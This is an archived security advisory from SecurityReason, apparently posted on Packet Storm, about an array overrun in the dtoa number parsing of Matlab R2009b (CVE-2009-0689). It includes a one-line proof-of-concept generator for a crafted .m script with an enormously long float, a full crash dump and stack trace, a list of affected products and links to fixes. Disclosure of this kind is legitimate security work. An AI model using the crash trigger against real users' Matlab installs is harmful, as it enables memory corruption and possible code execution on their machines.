exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Matlab R2009b Array Overrun

Matlab R2009b Array Overrun
Posted Jan 9, 2010
Authored by Maksymilian Arciemowicz | Site securityreason.com

Matlab R2009b suffers from an array overrun vulnerability that allows for code execution.

tags | exploit, overflow, code execution
advisories | CVE-2009-0689
SHA-256 | d0fecd045e6348016e15d944f4d2ab38c62e2de8cd2a7176be5367552b8e4e29

Matlab R2009b Array Overrun

Change Mirror Download
[ Matlab R2009b Array Overrun (code execution) ]

Author: Maksymilian Arciemowicz and sp3x
https://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 08.01.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Matlab R2009b

NOTE: Prior versions may also be affected.

Original URL:
https://securityreason.com/achievement_securityalert/80


--- 0.Description ---
MATLAB is a numerical computing environment and fourth generation
programming language. Developed by The MathWorks, MATLAB allows matrix
manipulation, plotting of functions and data, implementation of
algorithms, creation of user interfaces, and interfacing with programs
in other languages. Although it is numeric only, an optional toolbox
uses the MuPAD symbolic engine, allowing access to computer algebra
capabilities. An additional package, Simulink, adds graphical
multidomain simulation and Model-Based Design for dynamic and embedded
systems.

In 2004, MathWorks claimed that MATLAB was used by more than one million
people across industry and the academic world


--- 1. Matlab 2009b Array Overrun (code execution) ---
The main problem exist in dtoa implementation. Matlab has the same dtoa
as Mozilla, OpenBSD, MacOS, Google, Opera etc.
and it is the same like SREASONRES:20090625.

https://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,

https://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it
is possible to call 16<= elements of freelist array.


--- 2. Proof of Concept (PoC) ---
There are several ways to make a successful attack. Simplest assumed the
creation of a script with a defective floating-point variable and
execution it. This will allow the possibility of code execution.

-expl.m----------------------
cxib=0.<?php echo str_repeat("1",296450); ?>
-expl.m----------------------

MATLAB crash file:C:\DOCUME~1\WinXPae\USTAWI~1\Temp\matlab_crash_dump.552
------------------------------------------------------------------------
Segmentation violation detected at Wed Dec 03 12:04:02 2009
------------------------------------------------------------------------

Configuration:
MATLAB Version: 7.9.0.529 (R2009b)
MATLAB License: [PRIV]
Operating System: Microsoft Windows XP
Window System: Version 5.1 (Build 2600: Dodatek Service Pack 3)
Processor ID: x86 Family 6 Model 7 Stepping 6, GenuineIntel
Virtual Machine: Java 1.6.0_12-b04 with Sun Microsystems Inc. Java
HotSpot(TM) Client VM mixed mode
Default Encoding: windows-1250

Fault Count: 1

Register State:
EAX = 71c71c71 EBX = 188ade48
ECX = 0000000a EDX = 188adde0
ESI = 00000002 EDI = 00000003
EBP = 00c3dec0 ESP = 00c3de90
EIP = 7baf965e FLG = 00010206

Stack Trace:
[0] libut.dll:_Balloc(0x188adde0, 0x188ade48, 10, 1) + 14 bytes
[1] libut.dll:_s2b(0x188adde0, 333333, 333333, 0x069f6bc7) + 112 bytes
[2] libut.dll:_ut_strtod(0x188adde0, 0x19a80048
"0.111111111111111111111111111111..", 0x00c3e024, 0x00c3e028) + 1123 bytes
[3] m_ir.dll:_mps_parse_matlab_real(0x188ad9f0, 0x00c3e068, 11, 0) +
576 bytes
[4] m_parser.dll:_mps_convert_M_NUMBER(0x188afb90, 0x1971d070,
0x1971d048, 0x188afb90) + 71 bytes
[5] m_parser.dll:_mps_convert_lval(0x188afb90, 0x1971d048, 0x1971d070,
0) + 224 bytes
[6] m_parser.dll:_mps_convert_M_Primary_4(0x188afb90, 0x1971d084,
0x1971d0e8, 0x188afb90) + 191 bytes
[7] m_parser.dll:_mps_convert_M_Stmt_2(0x188afb90, 0x1971d0d4,
0x1971d0e8, 0x188afb90) + 247 bytes
[8] m_parser.dll:_mps_convert_M_Stmts_2(0x188afb90, 0x1971d0e8,
0x188afb90, 0x199d95b0) + 703 bytes
[9] m_parser.dll:_mps_make_M_body_from_parse_tree(0x1971d0e8, 0,
333337, 0) + 1283 bytes
[10] m_parser.dll:_mps_convert_script(0x00c3e788, 18, 0x00c3e550
"đĺĂ", 0x7a36323f) + 1073 bytes
[11] m_parser.dll:_mps_convert_M_File_1(0x188afb90, 0x189b3960,
0x188afb90, 0x189b3960) + 66 bytes
[12] m_parser.dll:_mps_M_to_IR_eval(0x00c3e7b4, 0x00c3e774,
0x00c3e778, 0x00c3e77c) + 1471 bytes
[13] m_parser.dll:_mps_M_to_IR(0x00c3e80f, 0x00c3e7b4, 0x00c3e774,
0x00c3e778) + 307 bytes
[14] m_interpreter.dll:public: void __thiscall
Mfh_mp::inCompileMfile(char const *)(0x03ba1a86 "C:\Documents And
Settings\WinXPa..", 1, 0x1977c300 "¤Ä.z", 0x00850000) + 492 bytes
[15] m_interpreter.dll:public: void __thiscall
Mfh_mp::inCompileMOrLoadPFile(void)(0, 0x7a1459e2, 1, 0x1977c300 "¤Ä.z")
+ 266 bytes
[16] m_interpreter.dll:public: virtual void __thiscall
Mlm_mp::load_file(void)(0, 0x1977c300 "¤Ä.z", 0, 0x78134c58) + 32 bytes
[17] m_dispatcher.dll:public: void __thiscall
Mlm_MATLAB_fn::try_load(void)(0x19728978, 0x78159334, 1, 0x00c3ee54
"ŘďĂ") + 71 bytes
[18] m_dispatcher.dll:public: void __thiscall
Mlm_MATLAB_fn::load(void)(0, 0x19728978, 0, 0xffffffff) + 76 bytes
[19] m_dispatcher.dll:public: virtual void __thiscall
Mfh_file::dispatch_fh(int,struct mxArray_tag * *,int,struct mxArray_tag
* *)(0, 0x00c3ef04, 0, 0x00c3ef64) + 364 bytes
[20] m_interpreter.dll:int __cdecl inDispatchFromStack(int,char const
*,int,int)(828, 0, 0, 0) + 623 bytes
[21] m_interpreter.dll:_inCallFcnFromReference(0x19860138, 0x198d00e0,
0, 0x02850000) + 80 bytes
[22] m_interpreter.dll:int __cdecl inInterp(enum
inDebugCheck,int,int,enum opcodes,struct inPcodeNest_tag volatile *,int
*)(1, 0, 1, 0) + 6204 bytes
[23] m_interpreter.dll:int __cdecl protected_inInterp(enum
inDebugCheck,int,int,enum opcodes,struct inPcodeNest_tag *,int *)(1, 0,
1, 0) + 39 bytes
[24] m_interpreter.dll:int __cdecl inInterPcodeSJ(enum
inDebugCheck,int,int,enum opcodes,struct inPcodeNest_tag *,int *)(1, 0,
1, 0) + 251 bytes
[25] m_interpreter.dll:int __cdecl inExecuteMFunctionOrScript(class
Mfh_mp *,bool)(0x02850001, 0xffffffff, 0x19a187b0, 0) + 924 bytes
[26] m_interpreter.dll:void __cdecl inRunMfile(int,struct mxArray_tag
* *,int,struct mxArray_tag * *,class Mfh_mp *,struct inWorkSpace_tag
*)(0, 0x00c3f988, 0, 0) + 466 bytes
[27] m_interpreter.dll:public: virtual void __thiscall
Mfh_mp::dispatch_file(struct _mdUnknown_workspace *,int,struct
mxArray_tag * *,int,struct mxArray_tag * *)(0, 0, 0x00c3f988, 0) + 23 bytes
[28] m_interpreter.dll:public: virtual void __thiscall
Mfh_mp::dispatch_file(int,struct mxArray_tag * *,int,struct mxArray_tag
* *)(0, 0x00c3f988, 0, 0) + 25 bytes
[29] m_dispatcher.dll:public: virtual void __thiscall
Mfh_file::dispatch_fh(int,struct mxArray_tag * *,int,struct mxArray_tag
* *)(0, 0x00c3f988, 0, 0) + 204 bytes
[30] m_interpreter.dll:void __cdecl inEvalPcodeHeaderToWord(struct
_memory_context *,int,struct mxArray_tag * * const,struct _pcodeheader
*,class Mfh_mp *,unsigned long)(0x7bb796d4, 0, 0x00c3f988, 0x00c3f898) +
73 bytes
[31] m_interpreter.dll:enum inExecutionStatus __cdecl
in_local_call_script_function(struct _memory_context *,struct
_pcodeheader *,int,struct mxArray_tag * * const,unsigned
long,bool)(0x7bb796d4, 0x00c3f898, 0, 0x00c3f988) + 70 bytes
[32]
m_interpreter.dll:__catch$??1inProtectHotSegment@@QAE@XZ$0(0x7bb796d4,
0x03ae5b90 "ma\n", 0, 0) + 888 bytes
[33] m_interpreter.dll:enum inExecutionStatus __cdecl
inEvalCmdWithLocalReturn(char const *,int *,bool,bool,bool
(__cdecl*)(void *,char const *))(0x03ae5b90 "ma\n", 0, 0, 1) + 80 bytes
[34] m_interpreter.dll:public: virtual enum inExecutionStatus
__thiscall InterpBridge::EvalCmdWithLocalReturn(char const *,int
*,bool,bool)(0x03ae5b90 "ma\n", 0, 0, 1) + 25 bytes
[35] m_interpreter.dll:_inEvalCmdWithLocalReturn(0x03ae5b90 "ma\n", 0,
0, 1) + 30 bytes
[36] bridge.dll:enum inExecutionStatus __cdecl
evalCommandWithLongjmpSafety(char const *)(0x03ae5b90 "ma\n", 0,
0x18894ac8, 0) + 67 bytes
[37] bridge.dll:__catch$_mnParser$0(0x03d0b378, 0, 0x068ce201, 1) +
300 bytes
[38] mcr.dll:private: void __thiscall
mcrInstance::mnParser_on_interpreter_thread(void)(0x18894b00,
0x066fe5dc, 10, 0x00c3fccc) + 51 bytes
[39] mcr.dll:public: void __thiscall
boost::function0<void>::operator()(void)const (0, 0x18894ac8, 0,
0x18894ac8) + 63 bytes
[40] mcr.dll:public: virtual void __thiscall
mcr::runtime::InterpreterThread::Impl::NoResultInvocationRequest::run(void)(0x7a27a800,
0x066fe000 "...y", 0x00c3fb54, 0) + 53 bytes
[41] mcr.dll:private: static void __cdecl
mcr::runtime::InterpreterThread::Impl::invocation_request_handler(int)(0x18894ac8,
0, 0x00030000 "Actx ", 0x00c3fcb4) + 40 bytes
[42] uiw.dll:bool __cdecl UIW_DispatchUserMessage(int,int)(9225,
0x18894ac8, 0x00c3fcb4, 2) + 81 bytes
[43] uiw.dll:long __stdcall HandleUserMsgHook(int,unsigned
int,long)(0, 1, 0x00c3fcb4, 0x79c73540) + 95 bytes
[44] USER32.dll:0x7e381923(0x00030000 "Actx ", 1, 0x00c3fcb4, 0x7b38edd0)
[45] USER32.dll:0x7e37b317(0x00c3fca4, 0x00c3fcb4, 0x00c3fcd0, 0)
[46] USER32.dll:0x7e3778d0(0x00c3fca4, 48, 0x00030000 "Actx ", 1)
[47] ntdll.dll:0x7c90e473(0x00c3fd20, 0, 0, 0)
[48] uiw.dll:void __cdecl UIW_GetAndDispatchMessage(struct tagMSG
*)(0x00c3fd20, 2, 2, 0x18894ac8) + 20 bytes
[49] uiw.dll:void __cdecl UIW_GetAndDispatchMessage(void)(0x03cddcf0,
0, 0x03d40d00, 0) + 15 bytes
[50] uiw.dll:void __cdecl ws_ProcessPendingEventsMainLoop(int,bool)(1,
0, 0x00c3fdbc "üýĂ", 0x7a27d26a) + 356 bytes
[51] uiw.dll:void __cdecl ws_ProcessPendingEvents(int,int)(1,
0xffffffff, 0x03cddcf0, 0x03d40d00) + 14 bytes
[52] mcr.dll:public: void __thiscall
mcr::runtime::InterpreterThread::Impl::process_events(class
boost::shared_ptr<class mcr::runtime::InterpreterThread::Impl> const
&)(0x00c3fe14, 2, 0x03d40768, 0x046add8c) + 138 bytes
[53]
mcr.dll:__catch$?run@Impl@InterpreterThread@runtime@mcr@@QAEKABV?$shared_ptr@VImpl@InterpreterThread@runtime@mcr@@@boost@@PAUinit_context@1234@@Z$0(0x00c3fe14,
0x03d44280, 0x7a27d630, 0x03d3d710) + 128 bytes
[54] mcr.dll:unsigned long __cdecl run_init_and_handle_events(void
*)(0x046add8c, 0, 0x03d40708, 0) + 76 bytes
[55] mcr.dll:private: void __thiscall
mcr::runtime::InterpreterThreadFactory::runThreadFunction(void)(0x00c3fec8,
0x00c3fe80, 0x00c3fe84 "đţĂ", 0x7bafb34c) + 108 bytes
[56] matlab.exe:public: void __thiscall
boost::function0<void>::operator()(void)const (336710, 0x0040b7f4, 0,
0x78131731) + 63 bytes
[57] matlab.exe:int __cdecl mcrMain(int,char const * * const)(1,
0x03d43378, 4194304, 1) + 230 bytes
[58] matlab.exe:_WinMain@16(4194304, 0, 336710, 1) + 75 bytes
[59] matlab.exe:___tmainCRTStartup(1068244, 514808, 0x7ffde000,
0x80544c7d) + 320 bytes
[60] kernel32.dll:0x7c817077(0x00406faa, 0, 0x00905a4d, 3)

eax=0x71c71c71

edi=0x0 esi=0x2

--- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock
- MatLab
- J

This list is not yet closed.


--- 4. Fix ---
NetBSD fix (optimal):
https://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


--- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.


--- 6. Greets ---
Infospec p_e_a pi3


--- 7. Contact ---
Email:
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com

GPG:
- https://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- https://securityreason.com/key/sp3x.gpg

https://securityreason.com/
https://securityreason.com/exploit_alert/ - Exploit Database
https://securityreason.com/security_alert/ - Vulnerability Database



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close